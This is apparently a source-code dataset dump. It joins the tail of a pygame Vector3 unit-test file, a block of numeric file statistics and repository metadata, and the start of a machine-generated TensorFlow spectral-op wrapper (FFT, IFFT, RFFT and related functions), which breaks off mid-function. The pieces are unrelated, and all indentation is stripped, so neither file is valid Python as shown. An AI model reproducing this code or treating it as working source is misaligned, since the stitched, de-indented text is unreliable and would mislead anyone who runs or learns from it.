self.assertEqual(7.5 * self.v1.elementwise() , 7.5 * self.v1)
self.assertEqual(-3.5 / self.v1.elementwise(), (-3.5 / self.v1.x, -3.5 / self.v1.y, -3.5 / self.v1.z))
self.assertEqual(-3.5 // self.v1.elementwise(), (-3.5 // self.v1.x, -3.5 // self.v1.y, -3.5 // self.v1.z))
self.assertEqual(-3.5 ** self.v1.elementwise(), (-3.5 ** self.v1.x, -3.5 ** self.v1.y, -3.5 ** self.v1.z))
self.assertEqual(3 % self.v1.elementwise(), (3 % self.v1.x, 3 % self.v1.y, 3 % self.v1.z))
self.assertEqual(2 < self.v1.elementwise(), 2 < self.v1.x and 2 < self.v1.y and 2 < self.v1.z)
self.assertEqual(2 > self.v1.elementwise(), 2 > self.v1.x and 2 > self.v1.y and 2 > self.v1.z)
self.assertEqual(1 == self.v1.elementwise(), 1 == self.v1.x and 1 == self.v1.y and 1 == self.v1.z)
self.assertEqual(1 != self.v1.elementwise(), 1 != self.v1.x and 1 != self.v1.y and 1 != self.v1.z)
self.assertEqual(2 <= self.v1.elementwise(), 2 <= self.v1.x and 2 <= self.v1.y and 2 <= self.v1.z)
self.assertEqual(-7 >= self.v1.elementwise(), -7 >= self.v1.x and -7 >= self.v1.y and -7 >= self.v1.z)
self.assertEqual(-7 != self.v1.elementwise(), -7 != self.v1.x and -7 != self.v1.y and -7 != self.v1.z)
# behaviour for "elementwise op vector"
self.assertEqual(type(self.v1.elementwise() * self.v2), type(self.v1))
self.assertEqual(self.v1.elementwise() + self.v2, self.v1 + self.v2)
self.assertEqual(self.v1.elementwise() + self.v2, self.v1 + self.v2)
self.assertEqual(self.v1.elementwise() - self.v2, self.v1 - self.v2)
self.assertEqual(self.v1.elementwise() * self.v2, (self.v1.x * self.v2.x, self.v1.y * self.v2.y, self.v1.z * self.v2.z))
self.assertEqual(self.v1.elementwise() / self.v2, (self.v1.x / self.v2.x, self.v1.y / self.v2.y, self.v1.z / self.v2.z))
self.assertEqual(self.v1.elementwise() // self.v2, (self.v1.x // self.v2.x, self.v1.y // self.v2.y, self.v1.z // self.v2.z))
self.assertEqual(self.v1.elementwise() ** self.v2, (self.v1.x ** self.v2.x, self.v1.y ** self.v2.y, self.v1.z ** self.v2.z))
self.assertEqual(self.v1.elementwise() % self.v2, (self.v1.x % self.v2.x, self.v1.y % self.v2.y, self.v1.z % self.v2.z))
self.assertEqual(self.v1.elementwise() > self.v2, self.v1.x > self.v2.x and self.v1.y > self.v2.y and self.v1.z > self.v2.z)
self.assertEqual(self.v1.elementwise() < self.v2, self.v1.x < self.v2.x and self.v1.y < self.v2.y and self.v1.z < self.v2.z)
self.assertEqual(self.v1.elementwise() >= self.v2, self.v1.x >= self.v2.x and self.v1.y >= self.v2.y and self.v1.z >= self.v2.z)
self.assertEqual(self.v1.elementwise() <= self.v2, self.v1.x <= self.v2.x and self.v1.y <= self.v2.y and self.v1.z <= self.v2.z)
self.assertEqual(self.v1.elementwise() == self.v2, self.v1.x == self.v2.x and self.v1.y == self.v2.y and self.v1.z == self.v2.z)
self.assertEqual(self.v1.elementwise() != self.v2, self.v1.x != self.v2.x and self.v1.y != self.v2.y and self.v1.z != self.v2.z)
# behaviour for "vector op elementwise"
self.assertEqual(self.v2 + self.v1.elementwise(), self.v2 + self.v1)
self.assertEqual(self.v2 - self.v1.elementwise(), self.v2 - self.v1)
self.assertEqual(self.v2 * self.v1.elementwise(), (self.v2.x * self.v1.x, self.v2.y * self.v1.y, self.v2.z * self.v1.z))
self.assertEqual(self.v2 / self.v1.elementwise(), (self.v2.x / self.v1.x, self.v2.y / self.v1.y, self.v2.z / self.v1.z))
self.assertEqual(self.v2 // self.v1.elementwise(), (self.v2.x // self.v1.x, self.v2.y // self.v1.y, self.v2.z // self.v1.z))
self.assertEqual(self.v2 ** self.v1.elementwise(), (self.v2.x ** self.v1.x, self.v2.y ** self.v1.y, self.v2.z ** self.v1.z))
self.assertEqual(self.v2 % self.v1.elementwise(), (self.v2.x % self.v1.x, self.v2.y % self.v1.y, self.v2.z % self.v1.z))
self.assertEqual(self.v2 < self.v1.elementwise(), self.v2.x < self.v1.x and self.v2.y < self.v1.y and self.v2.z < self.v1.z)
self.assertEqual(self.v2 > self.v1.elementwise(), self.v2.x > self.v1.x and self.v2.y > self.v1.y and self.v2.z > self.v1.z)
self.assertEqual(self.v2 <= self.v1.elementwise(), self.v2.x <= self.v1.x and self.v2.y <= self.v1.y and self.v2.z <= self.v1.z)
self.assertEqual(self.v2 >= self.v1.elementwise(), self.v2.x >= self.v1.x and self.v2.y >= self.v1.y and self.v2.z >= self.v1.z)
self.assertEqual(self.v2 == self.v1.elementwise(), self.v2.x == self.v1.x and self.v2.y == self.v1.y and self.v2.z == self.v1.z)
self.assertEqual(self.v2 != self.v1.elementwise(), self.v2.x != self.v1.x and self.v2.y != self.v1.y and self.v2.z != self.v1.z)
# behaviour for "elementwise op elementwise"
self.assertEqual(self.v2.elementwise() + self.v1.elementwise(), self.v2 + self.v1)
self.assertEqual(self.v2.elementwise() - self.v1.elementwise(), self.v2 - self.v1)
self.assertEqual(self.v2.elementwise() * self.v1.elementwise(),
(self.v2.x * self.v1.x, self.v2.y * self.v1.y, self.v2.z * self.v1.z))
self.assertEqual(self.v2.elementwise() / self.v1.elementwise(),
(self.v2.x / self.v1.x, self.v2.y / self.v1.y, self.v2.z / self.v1.z))
self.assertEqual(self.v2.elementwise() // self.v1.elementwise(),
(self.v2.x // self.v1.x, self.v2.y // self.v1.y, self.v2.z // self.v1.z))
self.assertEqual(self.v2.elementwise() ** self.v1.elementwise(),
(self.v2.x ** self.v1.x, self.v2.y ** self.v1.y, self.v2.z ** self.v1.z))
self.assertEqual(self.v2.elementwise() % self.v1.elementwise(),
(self.v2.x % self.v1.x, self.v2.y % self.v1.y, self.v2.z % self.v1.z))
self.assertEqual(self.v2.elementwise() < self.v1.elementwise(),
self.v2.x < self.v1.x and self.v2.y < self.v1.y and self.v2.z < self.v1.z)
self.assertEqual(self.v2.elementwise() > self.v1.elementwise(),
self.v2.x > self.v1.x and self.v2.y > self.v1.y and self.v2.z > self.v1.z)
self.assertEqual(self.v2.elementwise() <= self.v1.elementwise(),
self.v2.x <= self.v1.x and self.v2.y <= self.v1.y and self.v2.z <= self.v1.z)
self.assertEqual(self.v2.elementwise() >= self.v1.elementwise(),
self.v2.x >= self.v1.x and self.v2.y >= self.v1.y and self.v2.z >= self.v1.z)
self.assertEqual(self.v2.elementwise() == self.v1.elementwise(),
self.v2.x == self.v1.x and self.v2.y == self.v1.y and self.v2.z == self.v1.z)
self.assertEqual(self.v2.elementwise() != self.v1.elementwise(),
self.v2.x != self.v1.x and self.v2.y != self.v1.y and self.v2.z != self.v1.z)
# other behaviour
self.assertEqual(abs(self.v1.elementwise()), (abs(self.v1.x), abs(self.v1.y), abs(self.v1.z)))
self.assertEqual(-self.v1.elementwise(), -self.v1)
self.assertEqual(+self.v1.elementwise(), +self.v1)
self.assertEqual(bool(self.v1.elementwise()), bool(self.v1))
self.assertEqual(bool(Vector3().elementwise()), bool(Vector3()))
self.assertEqual(self.zeroVec.elementwise() ** 0, (1, 1, 1))
self.assertRaises(ValueError, lambda : pow(Vector3(-1, 0, 0).elementwise(), 1.2))
self.assertRaises(ZeroDivisionError, lambda : self.zeroVec.elementwise() ** -1)
self.assertRaises(ZeroDivisionError, lambda : Vector3(1,1,1).elementwise() / 0)
self.assertRaises(ZeroDivisionError, lambda : Vector3(1,1,1).elementwise() // 0)
self.assertRaises(ZeroDivisionError, lambda : Vector3(1,1,1).elementwise() % 0)
self.assertRaises(ZeroDivisionError, lambda : Vector3(1,1,1).elementwise() / self.zeroVec)
self.assertRaises(ZeroDivisionError, lambda : Vector3(1,1,1).elementwise() // self.zeroVec)
self.assertRaises(ZeroDivisionError, lambda : Vector3(1,1,1).elementwise() % self.zeroVec)
self.assertRaises(ZeroDivisionError, lambda : 2 / self.zeroVec.elementwise())
self.assertRaises(ZeroDivisionError, lambda : 2 // self.zeroVec.elementwise())
self.assertRaises(ZeroDivisionError, lambda : 2 % self.zeroVec.elementwise())
def test_slerp(self):
self.assertRaises(ValueError, lambda : self.zeroVec.slerp(self.v1, .5))
self.assertRaises(ValueError, lambda : self.v1.slerp(self.zeroVec, .5))
self.assertRaises(ValueError,
lambda : self.zeroVec.slerp(self.zeroVec, .5))
steps = 10
angle_step = self.e1.angle_to(self.e2) / steps
for i, u in ((i, self.e1.slerp(self.e2, i/float(steps))) for i in range(steps+1)):
self.assertAlmostEqual(u.length(), 1)
self.assertAlmostEqual(self.e1.angle_to(u), i * angle_step)
self.assertEqual(u, self.e2)
v1 = Vector3(100, 0, 0)
v2 = Vector3(0, 10, 7)
radial_factor = v2.length() / v1.length()
for i, u in ((i, v1.slerp(v2, -i/float(steps))) for i in range(steps+1)):
self.assertAlmostEqual(u.length(), (v2.length() - v1.length()) * (float(i)/steps) + v1.length())
self.assertEqual(u, v2)
self.assertEqual(v1.slerp(v1, .5), v1)
self.assertEqual(v2.slerp(v2, .5), v2)
self.assertRaises(ValueError, lambda : v1.slerp(-v1, 0.5))
def test_lerp(self):
v1 = Vector3(0, 0, 0)
v2 = Vector3(10, 10, 10)
self.assertEqual(v1.lerp(v2, 0.5), (5, 5, 5))
self.assertRaises(ValueError, lambda : v1.lerp(v2, 2.5))
v1 = Vector3(-10, -5, -20)
v2 = Vector3(10, 10, -20)
self.assertEqual(v1.lerp(v2, 0.5), (0, 2.5, -20))
def test_spherical(self):
v = Vector3()
v.from_spherical(self.v1.as_spherical())
self.assertEqual(self.v1, v)
self.assertEqual(self.e1.as_spherical(), (1, 90, 0))
self.assertEqual(self.e2.as_spherical(), (1, 90, 90))
self.assertEqual(self.e3.as_spherical(), (1, 0, 0))
self.assertEqual((2 * self.e2).as_spherical(), (2, 90, 90))
self.assertRaises(TypeError, lambda : v.from_spherical((None, None, None)))
self.assertRaises(TypeError, lambda : v.from_spherical("abc"))
self.assertRaises(TypeError, lambda : v.from_spherical((None, 1, 2)))
self.assertRaises(TypeError, lambda : v.from_spherical((1, 2, 3, 4)))
self.assertRaises(TypeError, lambda : v.from_spherical((1, 2)))
self.assertRaises(TypeError, lambda : v.from_spherical(1, 2, 3))
v.from_spherical((.5, 90, 90))
self.assertEqual(v, .5 * self.e2)
def test_inplace_operators(self):
v = Vector3(1,1,1)
v *= 2
self.assertEqual(v, (2.0,2.0,2.0))
v = Vector3(4,4,4)
v /= 2
self.assertEqual(v, (2.0,2.0,2.0))
v = Vector3(3.0,3.0,3.0)
v -= (1,1,1)
self.assertEqual(v, (2.0,2.0,2.0))
v = Vector3(3.0,3.0,3.0)
v += (1,1,1)
self.assertEqual(v, (4.0,4.0,4.0))
def test_pickle(self):
import pickle
v2 = Vector2(1, 2)
v3 = Vector3(1, 2, 3)
self.assertEqual(pickle.loads(pickle.dumps(v2)), v2)
self.assertEqual(pickle.loads(pickle.dumps(v3)), v3)
def test_subclass_operation(self):
class Vector(pygame.math.Vector3):
pass
v = Vector(2.0, 2.0, 2.0)
v *= 2
self.assertEqual(v, (4.0, 4.0, 4.0))
if __name__ == '__main__':
unittest.main()
| 47.80397
| 137
| 0.566286
| 11,241
| 77,060
| 3.846544
| 0.025443
| 0.116284
| 0.028978
| 0.035107
| 0.927959
| 0.902542
| 0.88478
| 0.857744
| 0.830015
| 0.801869
| 0
| 0.071315
| 0.268129
| 77,060
| 1,611
| 138
| 47.833644
| 0.695362
| 0.018674
| 0
| 0.585263
| 0
| 0
| 0.003056
| 0
| 0
| 0
| 0
| 0
| 0.612632
| 1
| 0.087018
| false
| 0.001404
| 0.004912
| 0.000702
| 0.095439
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6a8c96ebe85eb549a15b90eb71d719a691ac58bc
| 30,558
|
py
|
Python
|
lesson7.4/tensorflow/python/ops/gen_spectral_ops.py
|
magnusmel/Serverless-Deep-Learning-with-TensorFlow-and-AWS-Lambda
|
cc226deb7b46852407900f9fec0caf62638defe2
|
[
"MIT"
] | 21
|
2018-12-11T20:07:47.000Z
|
2021-11-08T13:12:32.000Z
|
lesson7.4/tensorflow/python/ops/gen_spectral_ops.py
|
magnusmel/Serverless-Deep-Learning-with-TensorFlow-and-AWS-Lambda
|
cc226deb7b46852407900f9fec0caf62638defe2
|
[
"MIT"
] | 1
|
2020-07-07T21:30:02.000Z
|
2020-07-08T18:16:03.000Z
|
lesson7.4/tensorflow/python/ops/gen_spectral_ops.py
|
magnusmel/Serverless-Deep-Learning-with-TensorFlow-and-AWS-Lambda
|
cc226deb7b46852407900f9fec0caf62638defe2
|
[
"MIT"
] | 15
|
2018-12-12T02:32:28.000Z
|
2021-11-05T20:40:10.000Z
|
"""Python wrappers around TensorFlow ops.
This file is MACHINE GENERATED! Do not edit.
Original C++ source file: spectral_ops.cc
"""
import collections as _collections
from tensorflow.python.eager import execute as _execute
from tensorflow.python.eager import context as _context
from tensorflow.python.eager import core as _core
from tensorflow.python.framework import dtypes as _dtypes
from tensorflow.python.framework import tensor_shape as _tensor_shape
from tensorflow.core.framework import op_def_pb2 as _op_def_pb2
# Needed to trigger the call to _set_call_cpp_shape_fn.
from tensorflow.python.framework import common_shapes as _common_shapes
from tensorflow.python.framework import op_def_registry as _op_def_registry
from tensorflow.python.framework import ops as _ops
from tensorflow.python.framework import op_def_library as _op_def_library
def _batch_fft(input, name=None):
r"""TODO: add doc.
Args:
input: A `Tensor` of type `complex64`.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `complex64`.
"""
_ctx = _context.context()
if _ctx.in_graph_mode():
_, _, _op = _op_def_lib._apply_op_helper(
"BatchFFT", input=input, name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = None
else:
input = _ops.convert_to_tensor(input, _dtypes.complex64)
_inputs_flat = [input]
_attrs = None
_result = _execute.execute(b"BatchFFT", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=_ctx, name=name)
_execute.record_gradient(
"BatchFFT", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def _batch_fft2d(input, name=None):
r"""TODO: add doc.
Args:
input: A `Tensor` of type `complex64`.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `complex64`.
"""
_ctx = _context.context()
if _ctx.in_graph_mode():
_, _, _op = _op_def_lib._apply_op_helper(
"BatchFFT2D", input=input, name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = None
else:
input = _ops.convert_to_tensor(input, _dtypes.complex64)
_inputs_flat = [input]
_attrs = None
_result = _execute.execute(b"BatchFFT2D", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=_ctx, name=name)
_execute.record_gradient(
"BatchFFT2D", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def _batch_fft3d(input, name=None):
r"""TODO: add doc.
Args:
input: A `Tensor` of type `complex64`.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `complex64`.
"""
_ctx = _context.context()
if _ctx.in_graph_mode():
_, _, _op = _op_def_lib._apply_op_helper(
"BatchFFT3D", input=input, name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = None
else:
input = _ops.convert_to_tensor(input, _dtypes.complex64)
_inputs_flat = [input]
_attrs = None
_result = _execute.execute(b"BatchFFT3D", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=_ctx, name=name)
_execute.record_gradient(
"BatchFFT3D", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def _batch_ifft(input, name=None):
r"""TODO: add doc.
Args:
input: A `Tensor` of type `complex64`.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `complex64`.
"""
_ctx = _context.context()
if _ctx.in_graph_mode():
_, _, _op = _op_def_lib._apply_op_helper(
"BatchIFFT", input=input, name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = None
else:
input = _ops.convert_to_tensor(input, _dtypes.complex64)
_inputs_flat = [input]
_attrs = None
_result = _execute.execute(b"BatchIFFT", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=_ctx, name=name)
_execute.record_gradient(
"BatchIFFT", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def _batch_ifft2d(input, name=None):
r"""TODO: add doc.
Args:
input: A `Tensor` of type `complex64`.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `complex64`.
"""
_ctx = _context.context()
if _ctx.in_graph_mode():
_, _, _op = _op_def_lib._apply_op_helper(
"BatchIFFT2D", input=input, name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = None
else:
input = _ops.convert_to_tensor(input, _dtypes.complex64)
_inputs_flat = [input]
_attrs = None
_result = _execute.execute(b"BatchIFFT2D", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=_ctx, name=name)
_execute.record_gradient(
"BatchIFFT2D", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def _batch_ifft3d(input, name=None):
r"""TODO: add doc.
Args:
input: A `Tensor` of type `complex64`.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `complex64`.
"""
_ctx = _context.context()
if _ctx.in_graph_mode():
_, _, _op = _op_def_lib._apply_op_helper(
"BatchIFFT3D", input=input, name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = None
else:
input = _ops.convert_to_tensor(input, _dtypes.complex64)
_inputs_flat = [input]
_attrs = None
_result = _execute.execute(b"BatchIFFT3D", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=_ctx, name=name)
_execute.record_gradient(
"BatchIFFT3D", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def fft(input, name=None):
r"""Fast Fourier transform.
Computes the 1-dimensional discrete Fourier transform over the inner-most
dimension of `input`.
Args:
input: A `Tensor` of type `complex64`. A complex64 tensor.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `complex64`.
A complex64 tensor of the same shape as `input`. The inner-most
dimension of `input` is replaced with its 1D Fourier transform.
@compatibility(numpy)
Equivalent to np.fft.fft
@end_compatibility
"""
_ctx = _context.context()
if _ctx.in_graph_mode():
_, _, _op = _op_def_lib._apply_op_helper(
"FFT", input=input, name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = None
else:
input = _ops.convert_to_tensor(input, _dtypes.complex64)
_inputs_flat = [input]
_attrs = None
_result = _execute.execute(b"FFT", 1, inputs=_inputs_flat, attrs=_attrs,
ctx=_ctx, name=name)
_execute.record_gradient(
"FFT", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def fft2d(input, name=None):
r"""2D fast Fourier transform.
Computes the 2-dimensional discrete Fourier transform over the inner-most
2 dimensions of `input`.
Args:
input: A `Tensor` of type `complex64`. A complex64 tensor.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `complex64`.
A complex64 tensor of the same shape as `input`. The inner-most 2
dimensions of `input` are replaced with their 2D Fourier transform.
@compatibility(numpy)
Equivalent to np.fft.fft2
@end_compatibility
"""
_ctx = _context.context()
if _ctx.in_graph_mode():
_, _, _op = _op_def_lib._apply_op_helper(
"FFT2D", input=input, name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = None
else:
input = _ops.convert_to_tensor(input, _dtypes.complex64)
_inputs_flat = [input]
_attrs = None
_result = _execute.execute(b"FFT2D", 1, inputs=_inputs_flat, attrs=_attrs,
ctx=_ctx, name=name)
_execute.record_gradient(
"FFT2D", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def fft3d(input, name=None):
r"""3D fast Fourier transform.
Computes the 3-dimensional discrete Fourier transform over the inner-most 3
dimensions of `input`.
Args:
input: A `Tensor` of type `complex64`. A complex64 tensor.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `complex64`.
A complex64 tensor of the same shape as `input`. The inner-most 3
dimensions of `input` are replaced with their 3D Fourier transform.
@compatibility(numpy)
Equivalent to np.fft.fftn with 3 dimensions.
@end_compatibility
"""
_ctx = _context.context()
if _ctx.in_graph_mode():
_, _, _op = _op_def_lib._apply_op_helper(
"FFT3D", input=input, name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = None
else:
input = _ops.convert_to_tensor(input, _dtypes.complex64)
_inputs_flat = [input]
_attrs = None
_result = _execute.execute(b"FFT3D", 1, inputs=_inputs_flat, attrs=_attrs,
ctx=_ctx, name=name)
_execute.record_gradient(
"FFT3D", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def ifft(input, name=None):
r"""Inverse fast Fourier transform.
Computes the inverse 1-dimensional discrete Fourier transform over the
inner-most dimension of `input`.
Args:
input: A `Tensor` of type `complex64`. A complex64 tensor.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `complex64`.
A complex64 tensor of the same shape as `input`. The inner-most
dimension of `input` is replaced with its inverse 1D Fourier transform.
@compatibility(numpy)
Equivalent to np.fft.ifft
@end_compatibility
"""
_ctx = _context.context()
if _ctx.in_graph_mode():
_, _, _op = _op_def_lib._apply_op_helper(
"IFFT", input=input, name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = None
else:
input = _ops.convert_to_tensor(input, _dtypes.complex64)
_inputs_flat = [input]
_attrs = None
_result = _execute.execute(b"IFFT", 1, inputs=_inputs_flat, attrs=_attrs,
ctx=_ctx, name=name)
_execute.record_gradient(
"IFFT", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def ifft2d(input, name=None):
r"""Inverse 2D fast Fourier transform.
Computes the inverse 2-dimensional discrete Fourier transform over the
inner-most 2 dimensions of `input`.
Args:
input: A `Tensor` of type `complex64`. A complex64 tensor.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `complex64`.
A complex64 tensor of the same shape as `input`. The inner-most 2
dimensions of `input` are replaced with their inverse 2D Fourier transform.
@compatibility(numpy)
Equivalent to np.fft.ifft2
@end_compatibility
"""
_ctx = _context.context()
if _ctx.in_graph_mode():
_, _, _op = _op_def_lib._apply_op_helper(
"IFFT2D", input=input, name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = None
else:
input = _ops.convert_to_tensor(input, _dtypes.complex64)
_inputs_flat = [input]
_attrs = None
_result = _execute.execute(b"IFFT2D", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=_ctx, name=name)
_execute.record_gradient(
"IFFT2D", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def ifft3d(input, name=None):
r"""Inverse 3D fast Fourier transform.
Computes the inverse 3-dimensional discrete Fourier transform over the
inner-most 3 dimensions of `input`.
Args:
input: A `Tensor` of type `complex64`. A complex64 tensor.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `complex64`.
A complex64 tensor of the same shape as `input`. The inner-most 3
dimensions of `input` are replaced with their inverse 3D Fourier transform.
@compatibility(numpy)
Equivalent to np.fft.ifftn with 3 dimensions.
@end_compatibility
"""
_ctx = _context.context()
if _ctx.in_graph_mode():
_, _, _op = _op_def_lib._apply_op_helper(
"IFFT3D", input=input, name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = None
else:
input = _ops.convert_to_tensor(input, _dtypes.complex64)
_inputs_flat = [input]
_attrs = None
_result = _execute.execute(b"IFFT3D", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=_ctx, name=name)
_execute.record_gradient(
"IFFT3D", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def irfft(input, fft_length, name=None):
r"""Inverse real-valued fast Fourier transform.
Computes the inverse 1-dimensional discrete Fourier transform of a real-valued
signal over the inner-most dimension of `input`.
The inner-most dimension of `input` is assumed to be the result of `RFFT`: the
`fft_length / 2 + 1` unique components of the DFT of a real-valued signal. If
`fft_length` is not provided, it is computed from the size of the inner-most
dimension of `input` (`fft_length = 2 * (inner - 1)`). If the FFT length used to
compute `input` is odd, it should be provided since it cannot be inferred
properly.
Along the axis `IRFFT` is computed on, if `fft_length / 2 + 1` is smaller
than the corresponding dimension of `input`, the dimension is cropped. If it is
larger, the dimension is padded with zeros.
Args:
input: A `Tensor` of type `complex64`. A complex64 tensor.
fft_length: A `Tensor` of type `int32`.
An int32 tensor of shape [1]. The FFT length.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `float32`.
A float32 tensor of the same rank as `input`. The inner-most
dimension of `input` is replaced with the `fft_length` samples of its inverse
1D Fourier transform.
@compatibility(numpy)
Equivalent to np.fft.irfft
@end_compatibility
"""
_ctx = _context.context()
if _ctx.in_graph_mode():
_, _, _op = _op_def_lib._apply_op_helper(
"IRFFT", input=input, fft_length=fft_length, name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = None
else:
input = _ops.convert_to_tensor(input, _dtypes.complex64)
fft_length = _ops.convert_to_tensor(fft_length, _dtypes.int32)
_inputs_flat = [input, fft_length]
_attrs = None
_result = _execute.execute(b"IRFFT", 1, inputs=_inputs_flat, attrs=_attrs,
ctx=_ctx, name=name)
_execute.record_gradient(
"IRFFT", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def irfft2d(input, fft_length, name=None):
r"""Inverse 2D real-valued fast Fourier transform.
Computes the inverse 2-dimensional discrete Fourier transform of a real-valued
signal over the inner-most 2 dimensions of `input`.
The inner-most 2 dimensions of `input` are assumed to be the result of `RFFT2D`:
The inner-most dimension contains the `fft_length / 2 + 1` unique components of
the DFT of a real-valued signal. If `fft_length` is not provided, it is computed
from the size of the inner-most 2 dimensions of `input`. If the FFT length used
to compute `input` is odd, it should be provided since it cannot be inferred
properly.
Along each axis `IRFFT2D` is computed on, if `fft_length` (or
`fft_length / 2 + 1` for the inner-most dimension) is smaller than the
corresponding dimension of `input`, the dimension is cropped. If it is larger,
the dimension is padded with zeros.
Args:
input: A `Tensor` of type `complex64`. A complex64 tensor.
fft_length: A `Tensor` of type `int32`.
An int32 tensor of shape [2]. The FFT length for each dimension.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `float32`.
A float32 tensor of the same rank as `input`. The inner-most 2
dimensions of `input` are replaced with the `fft_length` samples of their
inverse 2D Fourier transform.
@compatibility(numpy)
Equivalent to np.fft.irfft2
@end_compatibility
"""
_ctx = _context.context()
if _ctx.in_graph_mode():
_, _, _op = _op_def_lib._apply_op_helper(
"IRFFT2D", input=input, fft_length=fft_length, name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = None
else:
input = _ops.convert_to_tensor(input, _dtypes.complex64)
fft_length = _ops.convert_to_tensor(fft_length, _dtypes.int32)
_inputs_flat = [input, fft_length]
_attrs = None
_result = _execute.execute(b"IRFFT2D", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=_ctx, name=name)
_execute.record_gradient(
"IRFFT2D", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def irfft3d(input, fft_length, name=None):
r"""Inverse 3D real-valued fast Fourier transform.
Computes the inverse 3-dimensional discrete Fourier transform of a real-valued
signal over the inner-most 3 dimensions of `input`.
The inner-most 3 dimensions of `input` are assumed to be the result of `RFFT3D`:
The inner-most dimension contains the `fft_length / 2 + 1` unique components of
the DFT of a real-valued signal. If `fft_length` is not provided, it is computed
from the size of the inner-most 3 dimensions of `input`. If the FFT length used
to compute `input` is odd, it should be provided since it cannot be inferred
properly.
Along each axis `IRFFT3D` is computed on, if `fft_length` (or
`fft_length / 2 + 1` for the inner-most dimension) is smaller than the
corresponding dimension of `input`, the dimension is cropped. If it is larger,
the dimension is padded with zeros.
Args:
input: A `Tensor` of type `complex64`. A complex64 tensor.
fft_length: A `Tensor` of type `int32`.
An int32 tensor of shape [3]. The FFT length for each dimension.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `float32`.
A float32 tensor of the same rank as `input`. The inner-most 3
dimensions of `input` are replaced with the `fft_length` samples of their
inverse 3D real Fourier transform.
@compatibility(numpy)
Equivalent to np.irfftn with 3 dimensions.
@end_compatibility
"""
_ctx = _context.context()
if _ctx.in_graph_mode():
_, _, _op = _op_def_lib._apply_op_helper(
"IRFFT3D", input=input, fft_length=fft_length, name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = None
else:
input = _ops.convert_to_tensor(input, _dtypes.complex64)
fft_length = _ops.convert_to_tensor(fft_length, _dtypes.int32)
_inputs_flat = [input, fft_length]
_attrs = None
_result = _execute.execute(b"IRFFT3D", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=_ctx, name=name)
_execute.record_gradient(
"IRFFT3D", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def rfft(input, fft_length, name=None):
r"""Real-valued fast Fourier transform.
Computes the 1-dimensional discrete Fourier transform of a real-valued signal
over the inner-most dimension of `input`.
Since the DFT of a real signal is Hermitian-symmetric, `RFFT` only returns the
`fft_length / 2 + 1` unique components of the FFT: the zero-frequency term,
followed by the `fft_length / 2` positive-frequency terms.
Along the axis `RFFT` is computed on, if `fft_length` is smaller than the
corresponding dimension of `input`, the dimension is cropped. If it is larger,
the dimension is padded with zeros.
Args:
input: A `Tensor` of type `float32`. A float32 tensor.
fft_length: A `Tensor` of type `int32`.
An int32 tensor of shape [1]. The FFT length.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `complex64`.
A complex64 tensor of the same rank as `input`. The inner-most
dimension of `input` is replaced with the `fft_length / 2 + 1` unique
frequency components of its 1D Fourier transform.
@compatibility(numpy)
Equivalent to np.fft.rfft
@end_compatibility
"""
_ctx = _context.context()
if _ctx.in_graph_mode():
_, _, _op = _op_def_lib._apply_op_helper(
"RFFT", input=input, fft_length=fft_length, name=name)
_result = _op.outputs[:]
